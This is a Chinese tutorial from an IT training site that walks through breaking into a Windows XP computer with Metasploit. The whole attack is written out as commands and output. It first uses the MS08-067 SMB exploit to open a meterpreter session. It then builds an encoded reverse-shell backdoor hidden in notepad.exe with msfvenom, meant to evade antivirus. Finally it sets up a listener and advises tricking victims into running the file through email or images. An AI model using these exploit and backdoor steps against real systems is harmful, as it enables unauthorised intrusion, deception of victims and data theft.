测试工具之演示使用Metasploit入侵Windows
白羽 2018-12-26 来源 :网络 阅读 1142 评论 0

摘要:本文将带你了解测试工具演示使用Metasploit入侵Windows,希望本文对大家学测试工具有所帮助。

    本文将带你了解测试工具演示使用Metasploit入侵Windows,希望本文对大家学测试工具有所帮助。



                       


                     


   

  我使用Kali Linux的IP地址是192.168.0.112;在同一局域网内有一台运行Windows   XP(192.168.0.108)的测试电脑。

  本文演示怎么使用Metasploit入侵windows   xp sp3。

  启动msfconsole:

  #   msfconsole

   

  选择一个漏洞:

  msf   > search platform: windows xp sp3

     

  exploit/windows/smb/ms08_067_netapi是08年发现的漏洞,等级Great。

  查看某个漏洞的详细信息;包含使用方法、支持的平台等等,非常有帮助:

  msf   > info   exploit/windows/smb/ms08_067_netapi

     

  依次执行如下命令:

  msf   > use   exploit/windows/smb/ms08_067_netapi

  > set   payload windows/meterpreter/bind_tcp

  > set   RHOST 192.168.0.108  (设置目标主机IP地址)

  >   exploit

   

  如果目标主机有这个漏洞的话,你就可以控制它了;如果没有,尝试使用其他漏洞。

  [*]   Started bind handler

  [*] Automatically detecting the   target...

  [*] Fingerprint: Windows XP SP3 - Service   Pack 3 - lang:Chinese

  [*] Selected Target: Windows XP   SP3 Chinese (AlwaysOn NK)

  [*] Attempting to trigger   the vulnerability...

  [*] Sending stage (751104 bytes)   to 192.168.0.108

  [*] Meterpreter session 1 opened   (192.168.0.1:41614 -> 192.168.0.108:4444) at 2016-04-15   17:29:32

   

  meterpreter   >

  现在你就可以控制目标主机了,可以截屏、录音、视频、下载文件、杀进程等等;使用help查看可以执行的命令。

  演示使用后门程序侵入Windows

  原理:在Kali   Linux上生成后门程序,然后把它发送给受害者,欺骗受害者运行(使用邮件、图片等等)。难点是需要过杀毒软件和防火墙。

  生成后门程序:

  我把后门程序隐藏到记事本程序中:notepad.exe

  查看Kali   Linux的IP:ifconfig(192.168.0.112)

  创建后门程序,my_backdoor.exe:

  #   msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.112 LPORT=4445 -x   NOTEPAD.EXE -e x86/jmp_call_additive -i 4 -k -f exe >   my_backdoor.exe

   

  上面命令使用加密试图躲过杀毒软件,但是,不要期望它可以生效。使用man   msfvenom查看帮助。

  把它发送到Windows系统,并运行;如果不能运行换用其他加密方式。

  启动msfconsole:

  #   msfconsole

  use   exploit/multi/handler

  set LHOST   192.168.0.112

  set LPORT   4445

  set payload windows/meterpreter/reverse_tcp

  show   options

  exploit

   

  等待受害者启动后门程序。

     

  OK,入侵成功。

     

  

                   

本文由职坐标整理并发布,希望对同学们有所帮助。了解更多详情请关注职坐标软件测试之测试工具频道!


本文由 @白羽 发布于职坐标。未经许可,禁止转载。
喜欢 | 0 不喜欢 | 0
看完这篇文章有何感觉?已经有0人表态,0%的人喜欢 快给朋友分享吧~
评论(0)
后参与评论

您输入的评论内容中包含违禁敏感词

我知道了

助您圆梦职场 匹配合适岗位
验证码手机号,获得海同独家IT培训资料
选择就业方向:
人工智能物联网
大数据开发/分析
人工智能Python
Java全栈开发
WEB前端+H5

请输入正确的手机号码

请输入正确的验证码

获取验证码

您今天的短信下发次数太多了,明天再试试吧!

提交

我们会在第一时间安排职业规划师联系您!

您也可以联系我们的职业规划师咨询:

小职老师的微信号:z_zhizuobiao
小职老师的微信号:z_zhizuobiao

版权所有 职坐标-一站式IT培训就业服务领导者 沪ICP备13042190号-4
上海海同信息科技有限公司 Copyright ©2015 www.zhizuobiao.com,All Rights Reserved.
 沪公网安备 31011502005948号    

©2015 www.zhizuobiao.com All Rights Reserved

208小时内训课程